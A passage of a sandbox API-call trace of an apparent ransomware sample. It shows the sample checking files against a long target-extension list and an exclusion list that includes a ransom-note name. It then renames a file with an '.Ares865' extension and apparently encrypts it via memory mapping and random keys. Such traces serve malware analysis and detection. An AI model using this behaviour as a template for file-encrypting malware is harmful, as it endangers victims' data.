[0084.651] lstrcmpiW (lpString1="bmp", lpString2="dbx") returned -1 [0084.651] lstrlenW (lpString="dcb") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dcb") returned -1 [0084.651] lstrlenW (lpString="dct") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dct") returned -1 [0084.651] lstrlenW (lpString="dcx") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dcx") returned -1 [0084.651] lstrlenW (lpString="ddl") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="ddl") returned -1 [0084.651] lstrlenW (lpString="dlis") returned 4 [0084.651] lstrcmpiW (lpString1=".bmp", lpString2="dlis") returned -1 [0084.651] lstrlenW (lpString="dp1") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dp1") returned -1 [0084.651] lstrlenW (lpString="dqy") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dqy") returned -1 [0084.651] lstrlenW (lpString="dsk") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dsk") returned -1 [0084.651] lstrlenW (lpString="dsn") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dsn") returned -1 [0084.651] lstrlenW (lpString="dtsx") returned 4 [0084.651] lstrcmpiW (lpString1=".bmp", lpString2="dtsx") returned -1 [0084.651] lstrlenW (lpString="dxl") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="dxl") returned -1 [0084.651] lstrlenW (lpString="eco") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="eco") returned -1 [0084.651] lstrlenW (lpString="ecx") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="ecx") returned -1 [0084.651] lstrlenW (lpString="edb") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="edb") returned -1 [0084.651] lstrlenW (lpString="epim") returned 4 [0084.651] lstrcmpiW (lpString1=".bmp", lpString2="epim") returned -1 [0084.651] lstrlenW (lpString="fcd") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="fcd") returned -1 [0084.651] lstrlenW (lpString="fdb") returned 3 [0084.651] lstrcmpiW (lpString1="bmp", lpString2="fdb") returned -1 [0084.652] lstrlenW (lpString="fic") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fic") returned -1 [0084.652] lstrlenW (lpString="flexolibrary") returned 12 [0084.652] lstrcmpiW (lpString1="ertile11.bmp", lpString2="flexolibrary") returned -1 [0084.652] lstrlenW (lpString="fm5") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fm5") returned -1 [0084.652] lstrlenW (lpString="fmp") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fmp") returned -1 [0084.652] lstrlenW (lpString="fmp12") returned 5 [0084.652] lstrcmpiW (lpString1="1.bmp", lpString2="fmp12") returned -1 [0084.652] lstrlenW (lpString="fmpsl") returned 5 [0084.652] lstrcmpiW (lpString1="1.bmp", lpString2="fmpsl") returned -1 [0084.652] lstrlenW (lpString="fol") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fol") returned -1 [0084.652] lstrlenW (lpString="fp3") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fp3") returned -1 [0084.652] lstrlenW (lpString="fp4") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fp4") returned -1 [0084.652] lstrlenW (lpString="fp5") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fp5") returned -1 [0084.652] lstrlenW (lpString="fp7") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fp7") returned -1 [0084.652] lstrlenW (lpString="fpt") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="fpt") returned -1 [0084.652] lstrlenW (lpString="frm") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="frm") returned -1 [0084.652] lstrlenW (lpString="gdb") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.652] lstrlenW (lpString="gdb") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="gdb") returned -1 [0084.652] lstrlenW (lpString="grdb") returned 4 [0084.652] lstrcmpiW (lpString1=".bmp", lpString2="grdb") returned -1 [0084.652] lstrlenW (lpString="gwi") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="gwi") returned -1 [0084.652] lstrlenW (lpString="hdb") returned 3 [0084.652] lstrcmpiW (lpString1="bmp", lpString2="hdb") returned -1 [0084.652] lstrlenW (lpString="his") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="his") returned -1 [0084.653] lstrlenW (lpString="ib") returned 2 [0084.653] lstrcmpiW (lpString1="mp", lpString2="ib") returned 1 [0084.653] lstrlenW (lpString="idb") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="idb") returned -1 [0084.653] lstrlenW (lpString="ihx") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="ihx") returned -1 [0084.653] lstrlenW (lpString="itdb") returned 4 [0084.653] lstrcmpiW (lpString1=".bmp", lpString2="itdb") returned -1 [0084.653] lstrlenW (lpString="itw") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="itw") returned -1 [0084.653] lstrlenW (lpString="jet") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="jet") returned -1 [0084.653] lstrlenW (lpString="jtx") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="jtx") returned -1 [0084.653] lstrlenW (lpString="kdb") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="kdb") returned -1 [0084.653] lstrlenW (lpString="kexi") returned 4 [0084.653] lstrcmpiW (lpString1=".bmp", lpString2="kexi") returned -1 [0084.653] lstrlenW (lpString="kexic") returned 5 [0084.653] lstrcmpiW (lpString1="1.bmp", lpString2="kexic") returned -1 [0084.653] lstrlenW (lpString="kexis") returned 5 [0084.653] lstrcmpiW (lpString1="1.bmp", lpString2="kexis") returned -1 [0084.653] lstrlenW (lpString="lgc") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="lgc") returned -1 [0084.653] lstrlenW (lpString="lwx") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="lwx") returned -1 [0084.653] lstrlenW (lpString="maf") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="maf") returned -1 [0084.653] lstrlenW (lpString="maq") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="maq") returned -1 [0084.653] lstrlenW (lpString="mar") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="mar") returned -1 [0084.653] lstrlenW (lpString="marshal") returned 7 [0084.653] lstrcmpiW (lpString1="e11.bmp", lpString2="marshal") returned -1 [0084.653] lstrlenW (lpString="mas") returned 3 [0084.653] lstrcmpiW (lpString1="bmp", lpString2="mas") returned -1 [0084.653] lstrlenW (lpString="mav") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mav") returned -1 [0084.654] lstrlenW (lpString="maw") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="maw") returned -1 [0084.654] lstrlenW (lpString="mdbhtml") returned 7 [0084.654] lstrcmpiW (lpString1="e11.bmp", lpString2="mdbhtml") returned -1 [0084.654] lstrlenW (lpString="mdn") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mdn") returned -1 [0084.654] lstrlenW (lpString="mdt") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mdt") returned -1 [0084.654] lstrlenW (lpString="mfd") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mfd") returned -1 [0084.654] lstrlenW (lpString="mpd") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mpd") returned -1 [0084.654] lstrlenW (lpString="mrg") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mrg") returned -1 [0084.654] lstrlenW (lpString="mud") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mud") returned -1 [0084.654] lstrlenW (lpString="mwb") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="mwb") returned -1 [0084.654] lstrlenW (lpString="myd") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="myd") returned -1 [0084.654] lstrlenW (lpString="ndf") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="ndf") returned -1 [0084.654] lstrlenW (lpString="nnt") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="nnt") returned -1 [0084.654] lstrlenW (lpString="nrmlib") returned 6 [0084.654] lstrcmpiW (lpString1="11.bmp", lpString2="nrmlib") returned -1 [0084.654] lstrlenW (lpString="ns2") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="ns2") returned -1 [0084.654] lstrlenW (lpString="ns3") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="ns3") returned -1 [0084.654] lstrlenW (lpString="ns4") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="ns4") returned -1 [0084.654] lstrlenW (lpString="nsf") returned 3 [0084.654] lstrcmpiW (lpString1="bmp", lpString2="nsf") returned -1 [0084.654] lstrlenW (lpString="nv") returned 2 [0084.654] lstrcmpiW (lpString1="mp", lpString2="nv") returned -1 [0084.654] lstrlenW (lpString="nv2") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="nv2") returned -1 [0084.655] lstrlenW (lpString="nwdb") returned 4 [0084.655] lstrcmpiW (lpString1=".bmp", lpString2="nwdb") returned -1 [0084.655] lstrlenW (lpString="nyf") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="nyf") returned -1 [0084.655] lstrlenW (lpString="odb") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.655] lstrlenW (lpString="odb") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="odb") returned -1 [0084.655] lstrlenW (lpString="oqy") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="oqy") returned -1 [0084.655] lstrlenW (lpString="ora") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="ora") returned -1 [0084.655] lstrlenW (lpString="orx") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="orx") returned -1 [0084.655] lstrlenW (lpString="owc") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="owc") returned -1 [0084.655] lstrlenW (lpString="p96") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="p96") returned -1 [0084.655] lstrlenW (lpString="p97") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="p97") returned -1 [0084.655] lstrlenW (lpString="pan") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="pan") returned -1 [0084.655] lstrlenW (lpString="pdb") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="pdb") returned -1 [0084.655] lstrlenW (lpString="pdm") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="pdm") returned -1 [0084.655] lstrlenW (lpString="pnz") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="pnz") returned -1 [0084.655] lstrlenW (lpString="qry") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="qry") returned -1 [0084.655] lstrlenW (lpString="qvd") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="qvd") returned -1 [0084.655] lstrlenW (lpString="rbf") returned 3 [0084.655] lstrcmpiW (lpString1="bmp", lpString2="rbf") returned -1 [0084.655] lstrlenW (lpString="rctd") returned 4 [0084.656] lstrcmpiW (lpString1=".bmp", lpString2="rctd") returned -1 [0084.656] lstrlenW (lpString="rod") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="rod") returned -1 [0084.656] lstrlenW (lpString="rodx") returned 4 [0084.656] lstrcmpiW (lpString1=".bmp", lpString2="rodx") returned -1 [0084.656] lstrlenW (lpString="rpd") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="rpd") returned -1 [0084.656] lstrlenW (lpString="rsd") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="rsd") returned -1 [0084.656] lstrlenW (lpString="sas7bdat") returned 8 [0084.656] lstrcmpiW (lpString1="le11.bmp", lpString2="sas7bdat") returned -1 [0084.656] lstrlenW (lpString="sbf") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="sbf") returned -1 [0084.656] lstrlenW (lpString="scx") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="scx") returned -1 [0084.656] lstrlenW (lpString="sdb") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="sdb") returned -1 [0084.656] lstrlenW (lpString="sdc") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="sdc") returned -1 [0084.656] lstrlenW (lpString="sdf") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="sdf") returned -1 [0084.656] lstrlenW (lpString="sis") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="sis") returned -1 [0084.656] lstrlenW (lpString="spq") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="spq") returned -1 [0084.656] lstrlenW (lpString="te") returned 2 [0084.656] lstrcmpiW (lpString1="mp", lpString2="te") returned -1 [0084.656] lstrlenW (lpString="teacher") returned 7 [0084.656] lstrcmpiW (lpString1="e11.bmp", lpString2="teacher") returned -1 [0084.656] lstrlenW (lpString="tmd") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="tmd") returned -1 [0084.656] lstrlenW (lpString="tps") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="tps") returned -1 [0084.656] lstrlenW (lpString="trc") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.656] lstrlenW (lpString="trc") returned 3 [0084.656] lstrcmpiW (lpString1="bmp", lpString2="trc") returned -1 [0084.656] lstrlenW (lpString="trm") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="trm") returned -1 [0084.657] lstrlenW (lpString="udb") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="udb") returned -1 [0084.657] lstrlenW (lpString="udl") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="udl") returned -1 [0084.657] lstrlenW (lpString="usr") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="usr") returned -1 [0084.657] lstrlenW (lpString="v12") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="v12") returned -1 [0084.657] lstrlenW (lpString="vis") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="vis") returned -1 [0084.657] lstrlenW (lpString="vpd") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="vpd") returned -1 [0084.657] lstrlenW (lpString="vvv") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="vvv") returned -1 [0084.657] lstrlenW (lpString="wdb") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="wdb") returned -1 [0084.657] lstrlenW (lpString="wmdb") returned 4 [0084.657] lstrcmpiW (lpString1=".bmp", lpString2="wmdb") returned -1 [0084.657] lstrlenW (lpString="wrk") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="wrk") returned -1 [0084.657] lstrlenW (lpString="xdb") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="xdb") returned -1 [0084.657] lstrlenW (lpString="xld") returned 3 [0084.657] lstrcmpiW (lpString1="bmp", lpString2="xld") returned -1 [0084.657] lstrlenW (lpString="xmlff") returned 5 [0084.657] lstrcmpiW (lpString1="1.bmp", lpString2="xmlff") returned -1 [0084.657] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.Ares865") returned 90 [0084.657] MoveFileExW (lpExistingFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp.ares865"), dwFlags=0x1) returned 1 [0084.658] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp.Ares865" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile11.bmp.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0084.658] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=49208) returned 1 [0084.658] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x2cd0020 [0084.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2ef0 [0084.659] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0518 [0084.659] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0380) returned 1 [0084.659] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0084.659] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.660] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0xc340, lpName=0x0) returned 0x15c [0084.662] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xc340) returned 0x190000 [0084.667] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0380) returned 1 [0084.667] CryptGenRandom (in: hProv=0x2f0380, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0084.667] CryptReleaseContext (hProv=0x2f0380, dwFlags=0x0) returned 1 [0084.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d2f68 [0084.667] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2f68 | out: hHeap=0x2b0000) returned 1 [0084.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x31afc8 [0084.667] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32afc8 [0084.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x31afc8 | out: hHeap=0x2b0000) returned 1 [0084.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x32b0e0 [0084.668] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9d88 [0084.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32b0e0 | out: hHeap=0x2b0000) returned 1 [0084.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9d88 | out: hHeap=0x2b0000) returned 1 [0084.668] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x32afc8 | out: hHeap=0x2b0000) returned 1 [0084.668] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0084.668] CloseHandle (hObject=0x15c) returned 1 [0084.668] CloseHandle (hObject=0x118) returned 1 [0084.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d2ef0 | out: hHeap=0x2b0000) returned 1 [0084.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0518 | out: hHeap=0x2b0000) returned 1 [0084.669] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2cd0020 | out: hHeap=0x2b0000) returned 1 [0084.669] FindNextFileW (in: hFindFile=0x2ccf68, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xae2755d1, ftCreationTime.dwHighDateTime=0x1ca040d, ftLastAccessTime.dwLowDateTime=0xae2755d1, ftLastAccessTime.dwHighDateTime=0x1ca040d, ftLastWriteTime.dwLowDateTime=0xdb6d3417, ftLastWriteTime.dwHighDateTime=0x1c9ea0a, nFileSizeHigh=0x0, nFileSizeLow=0xc038, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="usertile12.bmp", cAlternateFileName="")) returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="aoldtz.exe") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2=".") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="..") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="windows") returned -1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="bootmgr") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="temp") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="pagefile.sys") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="boot") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="ids.txt") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="ntuser.dat") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="perflogs") returned 1 [0084.669] lstrcmpiW (lpString1="usertile12.bmp", lpString2="MSBuild") returned 1 [0084.669] lstrlenW (lpString="usertile12.bmp") returned 14 [0084.669] lstrlenW (lpString="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile11.bmp") returned 82 [0084.669] lstrcpyW (in: lpString1=0x2cce488, lpString2="usertile12.bmp" | out: lpString1="usertile12.bmp") returned="usertile12.bmp" [0084.669] lstrlenW (lpString="usertile12.bmp") returned 14 [0084.669] lstrlenW (lpString="Ares865") returned 7 [0084.669] lstrcmpiW (lpString1="e12.bmp", lpString2="Ares865") returned 1 [0084.669] lstrlenW (lpString=".dll") returned 4 [0084.670] lstrcmpiW (lpString1="usertile12.bmp", lpString2=".dll") returned 1 [0084.670] lstrlenW (lpString=".lnk") returned 4 [0084.670] lstrcmpiW (lpString1="usertile12.bmp", lpString2=".lnk") returned 1 [0084.670] lstrlenW (lpString=".ini") returned 4 [0084.670] lstrcmpiW (lpString1="usertile12.bmp", lpString2=".ini") returned 1 [0084.670] lstrlenW (lpString=".sys") returned 4 [0084.670] lstrcmpiW (lpString1="usertile12.bmp", lpString2=".sys") returned 1 [0084.670] lstrlenW (lpString="usertile12.bmp") returned 14 [0084.670] lstrlenW (lpString="bak") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="bak") returned 1 [0084.670] lstrlenW (lpString="ba_") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="ba_") returned 1 [0084.670] lstrlenW (lpString="dbb") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="dbb") returned -1 [0084.670] lstrlenW (lpString="vmdk") returned 4 [0084.670] lstrcmpiW (lpString1=".bmp", lpString2="vmdk") returned -1 [0084.670] lstrlenW (lpString="rar") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="rar") returned -1 [0084.670] lstrlenW (lpString="zip") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="zip") returned -1 [0084.670] lstrlenW (lpString="tgz") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="tgz") returned -1 [0084.670] lstrlenW (lpString="vbox") returned 4 [0084.670] lstrcmpiW (lpString1=".bmp", lpString2="vbox") returned -1 [0084.670] lstrlenW (lpString="vdi") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="vdi") returned -1 [0084.670] lstrlenW (lpString="vhd") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="vhd") returned -1 [0084.670] lstrlenW (lpString="vhdx") returned 4 [0084.670] lstrcmpiW (lpString1=".bmp", lpString2="vhdx") returned -1 [0084.670] lstrlenW (lpString="avhd") returned 4 [0084.670] lstrcmpiW (lpString1=".bmp", lpString2="avhd") returned -1 [0084.670] lstrlenW (lpString="db") returned 2 [0084.670] lstrcmpiW (lpString1="mp", lpString2="db") returned 1 [0084.670] lstrlenW (lpString="db2") returned 3 [0084.670] lstrcmpiW (lpString1="bmp", lpString2="db2") returned -1 [0084.670] lstrlenW (lpString="db3") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="db3") returned -1 [0084.671] lstrlenW (lpString="dbf") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="dbf") returned -1 [0084.671] lstrlenW (lpString="mdf") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="mdf") returned -1 [0084.671] lstrlenW (lpString="mdb") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="mdb") returned -1 [0084.671] lstrlenW (lpString="sql") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="sql") returned -1 [0084.671] lstrlenW (lpString="sqlite") returned 6 [0084.671] lstrcmpiW (lpString1="12.bmp", lpString2="sqlite") returned -1 [0084.671] lstrlenW (lpString="sqlite3") returned 7 [0084.671] lstrcmpiW (lpString1="e12.bmp", lpString2="sqlite3") returned -1 [0084.671] lstrlenW (lpString="sqlitedb") returned 8 [0084.671] lstrcmpiW (lpString1="le12.bmp", lpString2="sqlitedb") returned -1 [0084.671] lstrlenW (lpString="xml") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="xml") returned -1 [0084.671] lstrlenW (lpString="$er") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="$er") returned 1 [0084.671] lstrlenW (lpString="4dd") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="4dd") returned 1 [0084.671] lstrlenW (lpString="4dl") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="4dl") returned 1 [0084.671] lstrlenW (lpString="^^^") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="^^^") returned 1 [0084.671] lstrlenW (lpString="abs") returned 3 [0084.671] lstrcmpiW (lpString1="bmp", lpString2="abs") returned 1 [0084.671] lstrlenW (lpString="abx") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="abx") returned 1 [0084.672] lstrlenW (lpString="accdb") returned 5 [0084.672] lstrcmpiW (lpString1="2.bmp", lpString2="accdb") returned -1 [0084.672] lstrlenW (lpString="accdc") returned 5 [0084.672] lstrcmpiW (lpString1="2.bmp", lpString2="accdc") returned -1 [0084.672] lstrlenW (lpString="accde") returned 5 [0084.672] lstrcmpiW (lpString1="2.bmp", lpString2="accde") returned -1 [0084.672] lstrlenW (lpString="accdr") returned 5 [0084.672] lstrcmpiW (lpString1="2.bmp", lpString2="accdr") returned -1 [0084.672] lstrlenW (lpString="accdt") returned 5 [0084.672] lstrcmpiW (lpString1="2.bmp", lpString2="accdt") returned -1 [0084.672] lstrlenW (lpString="accdw") returned 5 [0084.672] lstrcmpiW (lpString1="2.bmp", lpString2="accdw") returned -1 [0084.672] lstrlenW (lpString="accft") returned 5 [0084.672] lstrcmpiW (lpString1="2.bmp", lpString2="accft") returned -1 [0084.672] lstrlenW (lpString="adb") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.672] lstrlenW (lpString="adb") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="adb") returned 1 [0084.672] lstrlenW (lpString="ade") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="ade") returned 1 [0084.672] lstrlenW (lpString="adf") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="adf") returned 1 [0084.672] lstrlenW (lpString="adn") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="adn") returned 1 [0084.672] lstrlenW (lpString="adp") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="adp") returned 1 [0084.672] lstrlenW (lpString="alf") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="alf") returned 1 [0084.672] lstrlenW (lpString="ask") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="ask") returned 1 [0084.672] lstrlenW (lpString="btr") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="btr") returned -1 [0084.672] lstrlenW (lpString="cat") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="cat") returned -1 [0084.672] lstrlenW (lpString="cdb") returned 3 [0084.672] lstrcmpiW (lpString1="bmp", lpString2="cdb") returned -1 [0084.672] lstrlenW (lpString="ckp") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="ckp") returned -1 [0084.673] lstrlenW (lpString="cma") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="cma") returned -1 [0084.673] lstrlenW (lpString="cpd") returned 3 [0084.673] lstrcmpiW (lpString1="bmp", lpString2="cpd") returned -1 [0084.673] lstrlenW 